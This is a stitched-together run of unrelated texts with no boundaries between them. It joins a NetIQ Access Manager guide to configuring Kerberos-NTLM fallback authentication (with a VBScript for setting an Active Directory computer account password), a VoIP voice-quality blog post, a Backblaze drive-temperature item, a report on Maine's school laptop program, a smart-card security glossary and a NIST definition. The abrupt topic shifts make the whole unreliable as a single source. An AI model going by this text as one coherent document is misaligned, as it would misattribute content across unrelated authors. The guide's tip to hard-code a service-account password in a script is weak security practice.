Many organizations need to fall back to NTLM authentication when a user's system is not part of the domain and Kerberos fails.

NT LAN Manager (NTLM)

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product, and attempts to provide backwards compatibility with LANMAN. NTLM version 2 (NTLMv2), introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks and adding the ability for a server to authenticate to the client.

NTLM is a suite of authentication and session security protocols used in various Microsoft network protocol implementations and supported by the NTLM Security Support Provider ("NTLMSSP"). Originally used for authentication and negotiation of secure DCE/RPC, NTLM is also used throughout Microsoft's systems as an integrated single sign-on mechanism. It is probably best recognized as part of the "Integrated Windows Authentication" stack for HTTP authentication; however, it is also used in Microsoft implementations of SMTP, POP3, IMAP (all part of Exchange), CIFS/SMB, Telnet, SIP, and possibly others.

The NTLM Security Support Provider provides authentication, integrity, and confidentiality services within the Windows Security Support Provider Interface (SSPI) framework. SSPI specifies a core set of security functionality that is implemented by supporting providers; the NTLMSSP is such a provider. The SSPI specifies, and the NTLMSSP implements, the following core operations:

Authentication — NTLM provides a challenge-response authentication mechanism, in which clients are able to prove their identities without sending a password to the server.

Signing — The NTLMSSP provides a means of applying a digital "signature" to a message.
This ensures that the signed message has not been modified (either accidentally or intentionally) and that the signing party has knowledge of a shared secret. NTLM implements a symmetric signature scheme (Message Authentication Code, or MAC); that is, a valid signature can only be generated and verified by parties that possess the common shared key.

Sealing — The NTLMSSP implements a symmetric-key encryption mechanism, which provides message confidentiality. In the case of NTLM, sealing also implies signing (a signed message is not necessarily sealed, but all sealed messages are signed).

NTLM has been largely supplanted by Kerberos as the authentication protocol of choice for domain-based scenarios. However, Kerberos is a trusted-third-party scheme and cannot be used in situations where no trusted third party exists; for example, member servers (servers that are not part of a domain), local accounts, and authentication to resources in an untrusted domain. In such scenarios, NTLM continues to be the primary authentication mechanism (and likely will be for a long time).

Microsoft no longer recommends NTLM in applications: "Implementers should be aware that NTLM does not support any recent cryptographic methods, such as AES or SHA-256. It uses cyclic redundancy check (CRC) or message digest algorithms (RFC1321) for integrity, and it uses RC4 for encryption. Deriving a key from a password is as specified in RFC1320 and FIPS46-2. Therefore, applications are generally advised not to use NTLM."

While Kerberos has replaced NTLM as the default authentication protocol in an Active Directory (AD) based single sign-on scheme, NTLM is still widely used where a domain controller is not available or is unreachable. For example, NTLM would be used if a client is not Kerberos capable, the server is not joined to a domain, or the user is remotely authenticating over the web.

The new authentication class will extend the existing Kerberos class.
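The symmetric-signature (MAC) property described above — that only holders of the shared key can generate or verify a signature — can be made concrete with a short sketch. Note that this is not NTLM's actual signing algorithm (which, as the Microsoft quote above notes, relies on CRC/MD5/RC4-era primitives); it is a generic message authentication code using Python's standard hmac module, shown only to illustrate the shared-key concept.

```python
import hashlib
import hmac

def sign(key: bytes, message: bytes) -> bytes:
    # Symmetric MAC: signer and verifier must hold the same shared key.
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, signature: bytes) -> bool:
    # Recompute the MAC and compare in constant time.
    return hmac.compare_digest(sign(key, message), signature)

key = b"shared-session-key"
msg = b"signed message"
sig = sign(key, msg)
print(verify(key, msg, sig))          # True
print(verify(key, b"tampered", sig))  # False
```

Anyone without the key can neither forge a valid signature nor detect tampering, which is exactly the guarantee the NTLMSSP signing operation provides to both ends of a session.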
It adds NTLM support alongside Kerberos, with a fallback mechanism. NAM will send an authentication challenge for both Kerberos and NTLM. The browser/user-agent will try Kerberos first; if that fails, NTLM will be tried. If the user chooses not to do NTLM, the fallback method will be executed.

Create a computer account and note down the username and password. To create the computer account, follow the section Computer Account Information below. Another option is to download the Jespa package from http://www.ioplex.com/downloads.php, extract it, copy SetupWizard.vbs, Readme.txt and the license file to the domain controller, execute SetupWizard.vbs, and note down the username and password.

NetIQ Access Manager Identity Server setup details

Download and copy the jar files containing the custom authentication class and its dependent library jars to the folder /opt/novell/nam/idp/webapps/nidp/WEB-INF/lib on your NAM 3.2.x / 4.0 Identity Server(s). As you would for any new authentication scheme in NAM, use the NAM Admin Console to define a new authentication Class, Method, and Contract on your Identity Server / Cluster.

First, define the Kerberos-NTLM Authenticator Class: under the "Local" tab, select Classes and click New to add the class. Specify a logical name for your class, e.g.
Kerb-Ntlm. From the drop-down list, select the "java class" parameter as Other and enter the "java class path" as com.netiq.custom.auth.KerbNtlmClass. Before hitting Apply or OK, add the following properties to the class:

com.novell.nidp.authentication.local.kerb.svcPrincipal – service principal, as created per the Kerberos authentication documentation
com.novell.nidp.authentication.local.kerb.realm – realm value
com.novell.nidp.authentication.local.kerb.jaas.conf – JAAS configuration file
com.novell.nidp.authentication.local.kerb.kdc – KDC IP address
com.novell.nidp.authentication.local.kerb.ADUserAttr – user store search attribute name
com.novell.nidp.authentication.local.kerb.upnSuffixes – UPN suffixes (domain names)

The parameters above are described in the NAM Kerberos documentation. The following parameters are used by NTLM:

DOMAIN_CONTROLLER_IP – AD domain controller IP address
DOMAIN_CONTROLLER_FQDN – AD domain controller FQDN
SERVICE_ACCOUNT_NAME – computer account name
SERVICE_ACCOUNT_PWD – computer account password
DOMAIN – Windows NT-style domain name

Your NAM authentication class is now defined. Next, define a NAM Identity Server Method using the custom Kerberos-NTLM Authenticator Class just created, and click Apply. Your NAM authentication method is now defined. Next, define a Contract and click Apply. Apply the changes on the IDP and update the IDP server.

Testing the configuration:

Access the NetIQ Identity Server page http(s)://<<idp server >>:<<port>>/nidp or a protected resource and select the newly created contract. If the client machine is connected to the domain, the user will be authenticated with Kerberos. If the client machine is not connected to the domain, an NTLM login prompt shows up; enter the user name as email@example.com and the password. If the user does not want to do NTLM, the user can click Cancel, and the fallback method will be executed.

Computer Account Information

If you don't have a computer account, follow these steps to create one in AD.
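Before moving on to account creation, here is a sketch of how the class properties described above might look once filled in. Every value below (host names, realm, IP addresses, file path, account name and password) is a placeholder for illustration only; substitute the values from your own environment and Kerberos setup.

```
com.novell.nidp.authentication.local.kerb.svcPrincipal = HTTP/idp.example.com@EXAMPLE.COM
com.novell.nidp.authentication.local.kerb.realm = EXAMPLE.COM
com.novell.nidp.authentication.local.kerb.jaas.conf = /opt/novell/nidpKrb5.conf
com.novell.nidp.authentication.local.kerb.kdc = 192.0.2.10
com.novell.nidp.authentication.local.kerb.ADUserAttr = samAccountName
com.novell.nidp.authentication.local.kerb.upnSuffixes = example.com

DOMAIN_CONTROLLER_IP = 192.0.2.10
DOMAIN_CONTROLLER_FQDN = dc1.example.com
SERVICE_ACCOUNT_NAME = CIGNEXCMS1
SERVICE_ACCOUNT_PWD = ALongRandomPassword
DOMAIN = EXAMPLE
```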
Step 1: Create the Service Account for NETLOGON Communication

To use the NTLM security provider as an authentication service, you will need to create a service account in Active Directory with a specific password. To create the service account, the Active Directory Users and Computers (ADUC) utility may be used. The NETLOGON service requires that this account be a Computer account (a User account will not work). We recommend that you use the same value for both the "Computer name" (cn) and "pre-Windows 2000 name" (sAMAccountName) and use only letters, digits and possibly underscores (do not use spaces). This name will be part of the service.acctname property described in the NtlmSecurityProvider Properties section.

Also determine and note the service account "distinguished name" (DN) for setting the password in the next step. The DN can usually be derived from the account name and domain. For example, if the service account name CIGNEXCMS1 is in the Active Directory domain cignex.com, the DN might be: CN=CIGNEXCMS1,CN=Computers,DC=CCA,DC=cignex,DC=com. If you are still not sure what the DN is, the ADSI Edit MMC snap-in will show you directory entries by DN.

Step 2: Set the Service Account Password

The service account password must be supplied to the authentication class. We are currently unaware of a standard Microsoft utility that can set passwords on Computer accounts, so the following VBScript is used to set the password on a Computer account. Copy and paste the following VBScript code into a file called SetComputerPass.vbs (you can also find this script as an attachment to this wiki).
Dim strDn, objPassword, strPassword, objComputer
If WScript.Arguments.Count <> 1 Then
    WScript.Echo "Usage: SetComputerPass.vbs <ComputerDN>"
    WScript.Quit
End If
strDn = WScript.Arguments.Item(0)
Set objPassword = CreateObject("ScriptPW.Password")
WScript.StdOut.Write "Password:"
strPassword = objPassword.GetPassword()
Set objComputer = GetObject("LDAP://" & strDn)
objComputer.SetPassword strPassword
WScript.Echo
WScript.Echo "Password set on " & strDn

Note: This script should also work remotely from another workstation, provided it is executed with sufficient credentials.

C:\>cscript SetComputerPass.vbs CN=CIGNEXCMS1,CN=Computers,DC=CCA,DC=cignex,DC=com
Password:

Note: You have to be logged in as an Administrator to run the above command. Do NOT use the computer account name as the password, and the password must satisfy the AD password policy. Use a long and random password and make a note of it; it will be configured later in portal-ext.properties.

If the interactive password prompt fails, open SetComputerPass.vbs with Notepad, temporarily hard-code the password by commenting out the lines that collect it (a ' starts a comment in VBScript), set it manually as follows, and run the command again:

'Set objPassword = CreateObject("ScriptPW.Password")
'strPassword = objPassword.GetPassword()
strPassword = "ALongRandomPassword"

Note: Unlike User accounts, Computer account passwords do not expire. Domain security policy is frequently used to instruct Windows installations to periodically reset their own passwords; in practice, however, these accounts are not denied access if they do not (for example because they were turned off for several months).

Configuration of the authentication class for NTLMv2

Add a UPN suffix for NTLMv2 to succeed. This is necessary because NTLM returns/authenticates based on the sAMAccountName and does not return the email address of the user, so the LDAP lookup can only be done via the AD username, not the email address.
If a UPN suffix is added, the userPrincipalName can be found by building the username into email format.

Disclaimer: As with everything else at NetIQ Cool Solutions, this content is definitely not supported by NetIQ, so Customer Support will not be able to help you if it has any adverse effect on your environment. It just worked for at least one person, and perhaps it will be useful for you too. Be sure to test in a non-production environment.
The onset of mobile phones has made us tolerant of bad voice quality on our phone conversations. VoIP technology has made voice and video communication accessible and affordable to many people, and service providers and carriers have been striving to provide high quality voice using VoIP technology. So, what is so different in VoIP from the "old" technology?

VoIP carries voice signals over an IP network. This is fundamentally different from the "old" circuit-switched technology, where digital voice signals were carried on dedicated channels. IP was designed to carry data. That meant the file you wanted to download could take its own time: you wouldn't be concerned whether it downloaded in 20 seconds or 100 seconds, as long as it completed in a reasonable time. However, a telephone conversation should be more "real-time". You expect to hear a "Hello" from the other end immediately after you've said hello, so that you can have a meaningful conversation. So, what network parameters affect voice quality in VoIP?

Bandwidth. Think of this as a pipe that can get you data. The bigger the pipe, the more simultaneous conversations you can have. But how big a pipe do you need for one conversation? The answer depends on the codec. When analog voice is digitized, it is sampled 8000 times per second, and each sample is encoded in 8 bits. So we need a bandwidth of 64000 bits per second (or 64 kbps) one way. Nowadays, available bandwidth is not a concern – as long as all of you at home are not watching your own movies streamed over the internet.

Packet loss. The IP network is expected to be lossy; packets can be dropped randomly. However, today's IP network is fairly reliable and losses are minimal – core networks advertise maximum loss rates of 0 – 0.5%. Packet loss is the main contributor to bad voice quality, and codecs are very sensitive to it. Ideally, there should be zero packet loss.

Jitter. We saw earlier that 8000 samples of voice are taken per second.
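The figures above (8000 samples per second, 8 bits per sample) and the RTP packetization discussed next can be tied together with a little arithmetic. The sketch below assumes plain 8-bit PCM (G.711) with a 20 ms packet interval and ignores IP/UDP/RTP header overhead.

```python
SAMPLE_RATE_HZ = 8000   # narrowband voice sampling rate
BITS_PER_SAMPLE = 8     # 8-bit PCM encoding (G.711)
PACKET_MS = 20          # typical RTP packetization interval

# One-way codec bandwidth, ignoring protocol header overhead.
bandwidth_bps = SAMPLE_RATE_HZ * BITS_PER_SAMPLE
print(bandwidth_bps)                      # 64000 -> 64 kbps

# Voice payload carried in each 20 ms RTP packet.
samples_per_packet = SAMPLE_RATE_HZ * PACKET_MS // 1000
payload_bytes = samples_per_packet * BITS_PER_SAMPLE // 8
print(samples_per_packet, payload_bytes)  # 160 samples, 160 bytes
```

So the receiver expects a 160-byte voice payload every 20 ms; any variation in that arrival rhythm is the jitter discussed next.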
The Real-time Transport Protocol (RTP) typically uses 20 ms or 30 ms packets, so the client expects a packet every 20 ms. Due to the nature of the IP network, packets may be delayed on the way; this variation in delay is called jitter. A way to tackle the problem is to use jitter buffers, but this can be a double-edged sword: a big buffer introduces latency, while a very small one can be useless. Usually it is better to have the jitter buffers on the endpoints and not in the network; this makes sure that no additional delays are introduced while still smoothing out the voice signal played.

Latency. This is the time it takes for packets to travel from source to destination. Physics tells us that signals take some finite time to travel; added to that are all the routers and switches the packets have to pass through. So a certain amount of time is spent in the network. The question is how much latency can be tolerated? The answer is: it depends. Remember that TV correspondent in the field, staring into the camera through a seemingly long silence before speaking? Assuming there is only latency in the network, the question becomes how long you can wait for a response after you've spoken. If the latency is very low, the responses will be immediate. If it is, say, 1 second, then you'll hear a response 2 seconds after you've spoken, because your voice packet takes 1 second to reach the other side and the response takes 1 second to reach you. ITU-T recommends a one-way ear-to-mouth delay of about 150 ms or less for excellent quality voice and up to 400 ms for acceptable quality.

So, how can we get a rough measure of end-to-end latency? I learnt a trick here at Bandwidth. Assume you have two mobile phones, Phone A and Phone B. The end-to-end delay can be measured like this:
- Use a microphone and connect it to a laptop.
- Run the Audacity application on the laptop.
- Call Phone B from Phone A.
- Answer Phone B and put it on speakerphone.
- Start recording in the Audacity application.
- Tap on the table. The sound is captured directly by the microphone over the air.
- After some delay, the same tap, having travelled through the network, comes out of the speakerphone and is captured by the microphone again.
- Stop recording.
- Look at the waveform shown in Audacity and identify the first tap sound and its second occurrence.
- The time difference represents the end-to-end delay.

This gives you a fairly accurate measure of the delay. In the figure above, the first noise is the tap on the table caught by the microphone through the air; the second noise is the tap heard from the phone that had the microphone near its speaker. As can be seen, the selection started at 10.311 s and ended at 10.629 s. The difference, 318 ms, is the end-to-end delay. So the next time you hear a distorted voice on your phone, you know what the possible causes could be.
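The arithmetic behind the Audacity measurement is just a subtraction of the two tap timestamps; the numbers below are the ones read off the waveform in the example above.

```python
# Timestamps (in seconds) of the two tap sounds read off the Audacity waveform.
first_tap_s = 10.311   # tap captured directly through the air
second_tap_s = 10.629  # same tap after its trip through the phone network

delay_ms = (second_tap_s - first_tap_s) * 1000
print(round(delay_ms))  # 318 -> an end-to-end delay of 318 ms
```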
Most of us know that extreme temperatures (whether hot or cold) can kill our electronics. But how much do you actually have to worry about temperature when it comes to your hard drive -- and all the precious data you store on it? The folks at Backblaze offer some insights, based on an analysis of over 34,000 drives.

Tl;dr: They find no significant correlation between temperature and failure rate overall. So if you keep the temperature within the recommended manufacturer range, you don't have to worry about keeping the drive extra cool. This comes with the caveat that their consumer- and enterprise-grade drives are running in pods in a data center, which provide airflow over the drives so they don't get too hot. Still, some drives get hotter than others depending on their locations, and different drive models run at different temperature ranges. Here's a geeky chart: Backblaze says "all of the drives run well within the 0˚C (or 5˚C) to 60˚C that the manufacturers specify for the drives."

The one drive Backblaze did find with a significant correlation between failure rate and higher temperature is the Seagate Barracuda 1.5TB. Unless your drives are that model, your drives are probably cool enough. (Assuming you're not working in high-heat environments and your computer isn't getting too hot, that is.)

Read more of Melanie Pinola's Tech IT Out blog and follow the latest IT news at ITworld. Follow Melanie on Twitter at @melaniepinola.
GORHAM, Maine -- The Maine Learning Technology Initiative appears to be a gamble that's paying off, according to a new report from the Maine Education Policy Research Institute.

The MLTI, a statewide program to provide every seventh- and eighth-grade student and their teachers with laptop computers and to provide teachers with professional development and training to help them integrate the new laptops into their classroom instruction, is in its first year. The Maine Education Policy Research Institute (MEPRI) conducted the MLTI's first-year evaluation. The goal of the research was to provide policymakers and practitioners with information to help them gauge whether the MLTI is doing what it was meant to do.

The evaluation was performed using surveys and case studies, the MEPRI said in the executive summary of its report. The surveys -- some of which were Web based -- were used as a primary means of gathering data from large samples of students, educators and parents. Case studies of representative schools and student groups were conducted, using interviews, focus groups, classroom observations and analysis of school-level documents -- such as memos to parents and school policies, including analysis of student work -- to collect other data.

The MEPRI evaluation team said it focused its evaluation on answering three key questions in the three core areas of teachers and teaching, students and learning, and schools and community. The three questions that guided the evaluation team were: How are the laptops being used? What are the impacts of the laptops on teachers, students, and schools? And are there obstacles to full implementation of the MLTI?

A majority of teachers reported using the laptop in lesson development and classroom instruction, according to the MEPRI evaluation, and teachers said they were better able to locate more up-to-date information, access information more easily and quickly, present lessons and create student assignments.
Teachers also said the changes were having positive impacts on their teaching, the evaluation found, because their lessons are more extensive, use more up-to-date resources and provide more opportunities to explore knowledge and information in greater depth. But teachers also reported that technical problems and a lack of technical support sometimes limit their use of the laptops. In addition, teachers said they need more time and professional development, including time to explore and learn how to use the technology, and professional development activities designed to help them integrate the technology more extensively into their curriculum development and instruction. Overall, the evaluation said, many teachers remain enthusiastic about the MLTI and look forward to learning more through sustained training efforts.

In the second core area, students and learning, the early evidence indicates that the MLTI has dramatically increased the use of technology within classrooms, the evaluation said. Students reported using their laptops to research information, complete assignments, create projects, and communicate with teachers and other students. As students begin to use the laptops more within their classes, they report increased interest in their schoolwork and an increase in the amount of work they are doing both in and out of school, the research found. The nature of student learning in classrooms may be changing because students have the tools to pursue, organize, analyze and present information more readily at hand, the report found, and although some students continue to experience technical problems, most are excited about using the laptops in their classes.

Although it is too soon to fully assess the impact of the MLTI on the third core area -- school and community -- early evidence indicates positive changes. Parents report that their children are more focused and more interested in school.
Schools have faced some added expenses in implementing the program, but through creative solutions many schools are finding ways to minimize these costs, and possibly even save money as the laptops replace materials such as reference books and calculators. Finally, school principals and superintendents anticipate even more positive changes resulting from the MLTI, although these impacts cannot yet be measured, the evaluation said.

The evaluation concluded that significant progress has been made in implementing the MLTI and that, though it is early in the implementation, the laptop program is having many positive impacts on teachers and their instruction and on students' engagement and learning. Some obstacles still exist in fully implementing the program, the evaluation said, but significant strides have been made in a very short time toward achieving the MLTI's goals.
2FA (Two-Factor Authentication): All techniques used to strengthen a typical username/password login (i.e. single-factor authentication) by adding a second security challenge.
3FF (3rd Form Factor): A very small SIM card, also known as micro-SIM, for use in small mobile devices.
3G (Third Generation): The broadband telecommunications systems that combine high-speed voice, data and multimedia.
3GPP (3G Partnership Project): An industry group that aims to produce specifications for a 3G system based on GSM networks.
4G: A comprehensive, secure, all-IP based mobile broadband solution for smartphones, tablets, laptop computers, wireless modems and other mobile devices.
Automatic Border Control: The use of an automated gate in lieu of a one-to-one meeting between the traveller and an immigration officer. The objective of deploying Automatic Border Control is to automate the process for a large percentage of the travellers' flow and to allow immigration officers to perform face-to-face control on identified targets.
Authentication: Techniques and solutions to grant or deny access to a given user for a given digital service. Consumers are very familiar with username/password as a basic access control technique for popular web services such as webmail or eMerchant web sites. Security-sensitive services such as payment or eGov often deploy more robust access control techniques, usually relying on Secure Elements, smart cards being one example.
Big data: A collection of data sets so large and complex that they are difficult to process with traditional applications. The term "big data" is commonly used to present new analytical applications leveraging the power of very large data sets. A typical example is CRM (Customer Relationship Management), whereby the analysis of large amounts of past data can provide tools to improve sales forecasts, stock management, marketing trends and customer behaviors.
Data analysis is foreseen as an opportunity to monetize such "big data" by improving business intelligence.
Biometrics: Human attributes that are unique to a given individual and can be digitized and then compared with a stored reference. Biometric data such as fingerprints can be used for security services such as access control, data encryption or digital signature. The challenge of biometry is to enroll and then securely store the reference data for each individual. Smart card solutions offer match-on-card applications, removing the need for online verification via a central database.
Bluetooth: A short-range wireless technology that simplifies communication and synchronization between the internet, devices and other computers. Bluetooth is commonly used for consumer electronics devices such as headsets for cell phones or MP3 players. Bluetooth first requires the user to establish a pairing between two devices; once this pairing is established, fast wireless data exchange between the two devices can take place.
Bot (Internet bot): A type of computer program designed to do automated tasks.
Border control: The act of controlling travellers' identities and visas when entering a given country (airports, seaports or roads).
CAC (Common Access Card): A US Department of Defense smart card issued as standard physical and network identification for military and other personnel.
CDMA (Code Division Multiple Access): A wireless communications technology that uses spread spectrum communication to provide increased bandwidth.
Cloud computing: Computing by using servers, storage and applications that are accessed via the internet. Cloud computing is the architecture of choice for popular applications such as webmail, social networks and collaborative applications such as Microsoft Office 365 or Google Docs. The promises of cloud computing are no data losses, no backup needed and no software license updates needed.
Applications are executed from a web browser or an app; the application itself and the user data are hosted in a data center. Cloud computing is often seen as the alternative to client software, where a license of a given software is installed and executed on the user's device.
Contactless card: A card that communicates by means of a radio frequency signal, eliminating the need for physical contact with a reader. Contactless communications includes several technologies aiming at performing short-range data transfer between two communicating devices; operational ranges can vary from 2 cm to 10 – 15 meters. Contactless cards used for payment or transport use very short-range technology: the card's silicon chip is powered by the proximity of the reader to establish the contactless communication in a secure manner.
CRM (Customer Relationship Management): A set of tools and techniques using data to enhance sales forecasts, supply strategy, pricing strategy and all aspects of products-and-services strategy. CRM is foreseen as a key application of big data, where large amounts of past data can really enhance current and future business steering and decision making.
DDA (Dynamic Data Authentication): Authentication technology that allows banks to approve transactions at the terminal in a highly secure way.
DI (Dual Interface): A device that is both contact and contactless. Dual-interface cards, combining contact and contactless transactions, are often used for EMV payment. There are also more and more payment-plus-transport cards, where a payment card is also used to access a mass transit network.
DIAGMONMO (Diagnostics and Monitoring Management Object): The Diagnostics and Monitoring (DiagMon) functions perform various diagnostics and monitoring activities on mobile phones. DIAGMONMO also defines a way to perform network monitoring (GSM, UMTS or LTE) by automatically getting network status from the handset.
Digital identity: Humans can own one or several digital identities - also called avatars - to be used to access various digital services. For secure services, digital identities must be issued by a Certificate Authority (CA) capable of establishing a link between the actual user and his/her digital identities. There is no limit to how many digital identities any given user may have.
Digital signature: An electronic signature created using a public-key algorithm that can be used by the recipient to authenticate the identity of the sender.
DM (Device Management): Management of mobile phone configuration, updates and other managed objects of mobile devices over the entire life-cycle, as defined by OMA DM. DM is also used generically to describe all methods and activities associated with mobile device management.
DNS cache poisoning: A technique that tricks a Domain Name Server (DNS server) into believing it has received authentic information when in reality it has not.
Dongle: Any small piece of hardware that plugs into a computer. The most popular form factors are USB keys or smart cards that can be inserted into card readers; innovative devices using optical readers have also been launched onto the market.
DOVID (Diffractive Optical Variable Image Device): A hologram, kinegram or other image used in secure printing of cards, documents etc.
DVB-H (Digital Video Broadcasting-Handheld): A technical specification for bringing broadcast services to handheld receivers.
EAC (Extended Access Control): A mechanism enhancing the security of ePassports whereby only authorized inspection systems can read biometric data.
eBanking: Accessing banking services via the internet.
eCommerce: Buying and selling goods via the internet.
EDGE: A pre-3G digital mobile phone technology allowing improved data transmission rates.
eGovernment: The use of digital technologies (often via the internet) to provide government services. Second-generation eGov 2.0 programs aim to increase efficiency, lower costs and reduce.
eID: Personal identification using a variety of devices secured by microprocessors, biometrics and other means.
EMV: The industry standard for international debit/credit cards established by Europay, MasterCard and Visa.
ePassport: An "electronic" passport with high-security printing, an inlay including an antenna and a microprocessor, and other security features.
ePurse: A small portable device that contains "electronic money" and is generally used for low-value transactions.
Ethernet: A diverse family of computer networking technologies for local area networks (LANs).
eTicketing: Electronic systems for issuing, checking and paying for tickets, predominantly for public transport.
ETSI (European Telecommunications Standards Institute): The EU organization in charge of defining European telecommunications standards.
FIPS 201 (Federal Information Processing Standard): A US federal government standard that specifies Personal Identity Verification requirements for employees and contractors.
FOMA (Freedom of Mobile Multimedia Access): The brand name for the world's first W-CDMA 3G services, offered by NTT DoCoMo, the Japanese operator.
FOTA: Please refer to FUMO.
FUMO (Firmware Update Management Object): An Open Mobile Alliance specification for updating the firmware of mobile devices over the air. FUMO allows mobile operators to update mobile devices across network infrastructure without requiring consumers or network engineers to initiate upgrades through direct contact. It enables operators and device manufacturers to perform over-the-air updates ranging from the simple (e.g. a security patch) to the most complex (e.g. important parts of the operating system).
GSM (Global System for Mobile Communications): A European standard for digital cellular phones that has now been widely adopted throughout the world.
GSMA (GSM Association): the global association for mobile phone operators. HIPAA (Health Insurance Portability and Accountability Act): the US act that protects health insurance coverage for workers and their families when they change or lose their jobs. HSPD-12 (Homeland Security Presidential Directive 12): orders all US Federal Agencies to issue secure and reliable forms of identification to employees and contractors, with a recommendation in favor of smart card technology. IAM: Identity and Access Management. ICAO (International Civil Aviation Organization): the United Nations agency which standardizes machine-readable and biometric passports worldwide. Instant Messaging: using text on a mobile handset to communicate in real time. IP (Internet Protocol): a protocol for communicating data across a network; hence an IP address is a unique computer address using the IP standard. ISO (International Organization for Standardization): an international body that produces the worldwide industrial and commercial "ISO" standards. Java: a network-oriented programming language invented by Sun Microsystems and specifically designed so that programs can be safely downloaded to remote devices. Key (keystroke) logging: a means of capturing a user's keystrokes on a computer keyboard, sometimes for malicious purposes. L6S (Lean Six Sigma): a methodology for eliminating defects and improving processes. LAWMO (Lock And Wipe Management Object): an Open Mobile Alliance specification for locking handsets in case they are lost or stolen, or for wiping the handsets' memory. The handset wipe removes all personal data stored either in the handset memory or on the inserted memory card. As a result, the handset is then totally blank, with no chance of retrieving the data. LTE (Long Term Evolution): the standard in advanced mobile network technology, often referred to as 4G.
M2M: technology enabling communication between machines, for applications such as smart meters, mobile health solutions, etc. Malware: malicious software designed to infiltrate or damage a computer system without the owner's consent. Man-in-the-middle attack: an attack in which an outsider is able to read, insert and modify messages between two parties without either of them knowing. mCommerce: buying and selling goods and services using a mobile device connected to the internet. MFS (Mobile Financial Services): banking services such as money transfer and payment, available via a mobile device. Microprocessor (smart) card: a "smart" card comprising a module embedded with a chip - a computer with its own processor, memory, operating system and application software. MicroSD card: a removable memory card that can also be modified by adding a microprocessor to become a Secure Element, using the SDIO protocol to communicate with the device. MIM (Machine Identification Module): the equivalent of a SIM with specific features such that it can be used in machines to enable authentication. MMS (Multimedia Messaging Service): a standard way of sending messages that include multimedia content (e.g. photographs) to and from mobile phones. MNO (Mobile Network Operator): a company that provides services for mobile device subscribers. Mobile banking: banking and payment services for unbanked users. Module: the unit formed of a chip and a contact plate. Mobile payment: using a mobile handset to pay for goods and services. NFC (Near-Field Communication): a wireless technology that enables communication over short distances (e.g. 4 cm), typically between a mobile device and a reader. OATH (The Initiative for Open Authentication): an industry coalition comprising Gemalto, Citrix, IBM, Verisign and others, that is creating open standards for strong authentication.
OMA (Open Mobile Alliance): a body that develops open standards for the mobile phone industry. OMA-CP (Open Mobile Alliance - Client Provisioning): a standardized protocol to configure basic settings on a mobile phone, using the SMS bearer. OMA-DM (Open Mobile Alliance - Device Management): a standardized protocol to configure advanced services on mobile phones, using the IP bearer. OS (Operating System): software that runs on computers and other smart devices and that manages the way they function. OTA (Over The Air): a method of distributing applications and new software updates to devices that are already in use. OTP (One Time Password): a password that is valid for only one login session or transaction. Password cracking: the process of recovering secret passwords from data in a computer system. PDA (Personal Digital Assistant): a mobile device that functions as a personal information manager, often with the ability to connect to the internet. PDC (Personal Digital Cellular): a 2G mobile phone standard used in Japan and South Korea. Phishing: sending fraudulent emails requesting someone's personal and financial details. PIN (Personal Identification Number): a secret code required to confirm a user's identity. PKI (Public Key Infrastructure): the software and/or hardware components necessary to enable the effective use of public key encryption technology. Public Key cryptography is a system that uses two different keys (public and private) for encrypting and signing data. RFID: short- to mid-range wireless communication technology typically used for low-end services with no security needs (tags). RUIM (Removable User Identity Module): an identity module for standards other than GSM. SCOMO (Software Component Management Object): an Open Mobile Alliance specification that allows a management authority to perform software management on a remote device, including installation, uninstallation, activation and deactivation of software components.
SE (Secure Element): a secure and personalised physical component added to a system to manage users' rights and to host secure apps. An SE typically consists of a silicon chip, a secure Operating System, application software and a secure protocol to communicate with the device. An SE can be a removable device (such as a UICC or µSD for mobile devices, or a MIM for M2M connected machines); it can also be a component inside the system. SIM (Subscriber Identity Module): a smart card for GSM systems. SMS (Short Message Service): a GSM service that sends and receives text messages to and from a mobile phone. Strong authentication: any authentication protocol that requires multiple factors to establish identity and privileges. This contrasts with traditional password authentication, which requires only one authentication factor, such as knowledge of a password. Common implementations of strong authentication use 'something you know' (a password) as one of the factors, and 'something you have' (a physical device) and/or 'something you are' (a biometric such as a fingerprint) as the other factors. TEE (Trusted Execution Environment): a software and hardware dedicated environment embedded within the core device microprocessor to host and execute secure applications. A TEE consists of dedicated logic (hardware) within the device microprocessor with its own secure Operating System (software) and a secure API to communicate with the device's rich Operating System. The TEE acts like a vault within the microprocessor to ensure secure provisioning and execution of security-sensitive applications such as payment. A TSM service is used to install software applications within the TEE environment, as well as performing activation/de-activation of services. Thin client: a computer (client) that depends primarily on a central server for processing activities. By contrast, a fat client does as much local processing as possible. Trojan: a program that contains or installs a malicious program.
TSM (Trusted Services Manager): a third party enabling Mobile Operators, Mass Transit Operators, Banks and businesses to offer combined services seamlessly and securely. UICC (Universal Integrated Circuit Card): a high-capacity smart card used in mobile terminals for GSM, UMTS/3G and now 4G/LTE networks. UMTS (Universal Mobile Telecommunications System): one of the 3G mobile telecommunications technologies, which is also being developed into a 4G technology. USB (Universal Serial Bus): a standard input/output bus that supports very high transmission rates. USIM (Universal Subscriber Identity Module): a SIM with advanced software that ensures continuity when migrating to 3G services. VPN (Virtual Private Network): a private network often used within a company or group of companies to communicate confidentially over a public network. W-CDMA (Wideband Code Division Multiple Access): a 3G technology for wireless systems based on CDMA technology.
Definition: A group of analytical approaches having a mathematically precise foundation which can serve as a framework or adjunct for human engineering and design skills and experience. See also formal verification, model checking. Entry modified 17 December 2004. Cite this as: Paul E. Black, "formal methods", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 17 December 2004. Available from: http://www.nist.gov/dads/HTML/formalmethod.html
